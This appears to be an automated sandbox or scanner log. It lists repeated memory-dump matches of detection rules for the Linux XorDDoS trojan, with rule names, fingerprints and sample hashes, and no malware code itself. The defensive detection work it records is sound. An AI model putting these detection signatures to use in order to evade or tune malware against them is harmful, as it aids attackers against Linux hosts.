Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6491.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6363.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6349.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6524.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6430.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6510.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6447.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6279.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6351.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6545.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
